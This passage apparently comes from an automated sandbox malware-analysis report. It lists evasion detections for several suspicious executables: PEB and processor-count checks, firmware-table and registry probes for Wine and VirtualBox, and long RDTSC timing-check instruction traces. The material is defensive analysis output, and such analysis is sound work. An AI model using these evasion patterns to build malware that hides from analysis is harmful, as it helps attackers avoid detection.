Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_1-9711

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe

System information queried: FirmwareTableInformation

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe

API/Special instruction interceptor: Address: 7FFE2220E814

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C7959 second address: 11C795D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C795D second address: 11C7967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C7967 second address: 11C796B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C796B second address: 11C796F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFEF3 second address: 11AFEF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFEF7 second address: 11AFEFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFEFF second address: 11AFF0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007FEE1507F266h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFF0B second address: 11AFF0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AFF0F second address: 11AFF18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C6881 second address: 11C688C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FEE1472CB56h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C688C second address: 11C6893 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C6C4C second address: 11C6C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C6C58 second address: 11C6C65 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C6C65 second address: 11C6C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C6F63 second address: 11C6F67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C6F67 second address: 11C6F7B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnl 00007FEE1472CB56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FEE1472CB56h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C6F7B second address: 11C6F7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C6F7F second address: 11C6FA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FEE1472CB69h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CB0A1 second address: 11CB0A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CB0A5 second address: 11CB0AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CB0AB second address: 11CB0B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA9C8 second address: 11EA9DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FEE1472CB5Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11BEECE second address: 11BEED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E8702 second address: 11E8715 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB5Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E8715 second address: 11E8778 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEE1507F272h 0x00000008 jg 00007FEE1507F266h 0x0000000e jmp 00007FEE1507F272h 0x00000013 jns 00007FEE1507F266h 0x00000019 popad 0x0000001a jmp 00007FEE1507F277h 0x0000001f pop edx 0x00000020 pop eax 0x00000021 jng 00007FEE1507F27Bh 0x00000027 pushad 0x00000028 jmp 00007FEE1507F26Bh 0x0000002d pushad 0x0000002e popad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E88C5 second address: 11E88C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E8DF4 second address: 11E8E31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1507F273h 0x00000007 push esi 0x00000008 jmp 00007FEE1507F26Eh 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push ebx 0x00000014 jmp 00007FEE1507F270h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E8F9F second address: 11E8FA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E8FA3 second address: 11E8FA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E8FA9 second address: 11E8FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E8FB4 second address: 11E8FBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E9125 second address: 11E9147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FEE1472CB67h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E9147 second address: 11E9160 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1507F270h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E9160 second address: 11E9170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E9170 second address: 11E9182 instructions: 0x00000000 rdtsc 0x00000002 js 00007FEE1507F268h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FEE1507F266h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E92F9 second address: 11E9333 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEE1472CB80h 0x00000008 jmp 00007FEE1472CB65h 0x0000000d jmp 00007FEE1472CB65h 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007FEE1472CB56h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E9333 second address: 11E9358 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEE1507F266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FEE1507F273h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E9358 second address: 11E9373 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FEE1472CB5Ah 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E9373 second address: 11E9383 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FEE1507F266h 0x0000000a jnc 00007FEE1507F266h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E94D4 second address: 11E94E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FEE1472CB56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E967D second address: 11E969D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FEE1507F274h 0x0000000b jl 00007FEE1507F266h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E969D second address: 11E96A3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E96A3 second address: 11E96AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E96AE second address: 11E96B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E96B7 second address: 11E96BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E96BB second address: 11E96DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEE1472CB69h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11BB8EF second address: 11BB91F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FEE1507F26Fh 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jmp 00007FEE1507F272h 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11BB91F second address: 11BB962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FEE1472CB56h 0x0000000a jo 00007FEE1472CB56h 0x00000010 popad 0x00000011 jnc 00007FEE1472CB6Eh 0x00000017 je 00007FEE1472CB5Ah 0x0000001d push edi 0x0000001e pop edi 0x0000001f push edx 0x00000020 pop edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push edx 0x00000024 pop edx 0x00000025 jnc 00007FEE1472CB56h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA0C6 second address: 11EA10A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1507F26Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007FEE1507F26Ah 0x00000013 jmp 00007FEE1507F277h 0x00000018 popad 0x00000019 push esi 0x0000001a je 00007FEE1507F266h 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 pop esi 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA10A second address: 11EA115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA115 second address: 11EA123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE1507F26Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA26E second address: 11EA281 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEE1472CB56h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA281 second address: 11EA28C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA28C second address: 11EA297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA297 second address: 11EA2A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FEE1507F266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA2A1 second address: 11EA2A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA84C second address: 11EA851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11ED6AB second address: 11ED6BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE1472CB5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EFC0B second address: 11EFC51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 jmp 00007FEE1507F270h 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007FEE1507F26Ah 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007FEE1507F276h 0x0000001e jc 00007FEE1507F266h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EFC51 second address: 11EFC56 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EFC56 second address: 11EFC7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jmp 00007FEE1507F276h 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EFDA3 second address: 11EFDAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EFDAC second address: 11EFDB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EFDB0 second address: 11EFDB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EFDB4 second address: 11EFDD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FEE1507F271h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EFDD0 second address: 11EFDD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EFDD4 second address: 11EFDDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EFDDE second address: 11EFDE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EFDE2 second address: 11EFDF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jo 00007FEE1507F270h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EFDF7 second address: 11EFE19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 ja 00007FEE1472CB60h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push ecx 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B8427 second address: 11B842B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B842B second address: 11B8460 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE1472CB5Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007FEE1472CB6Eh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B8460 second address: 11B848B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FEE1507F266h 0x0000000a jnc 00007FEE1507F266h 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FEE1507F277h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F5959 second address: 11F5979 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEE1472CB58h 0x00000008 jmp 00007FEE1472CB5Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F5979 second address: 11F598D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE1507F270h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F598D second address: 11F5991 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F5AC9 second address: 11F5ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
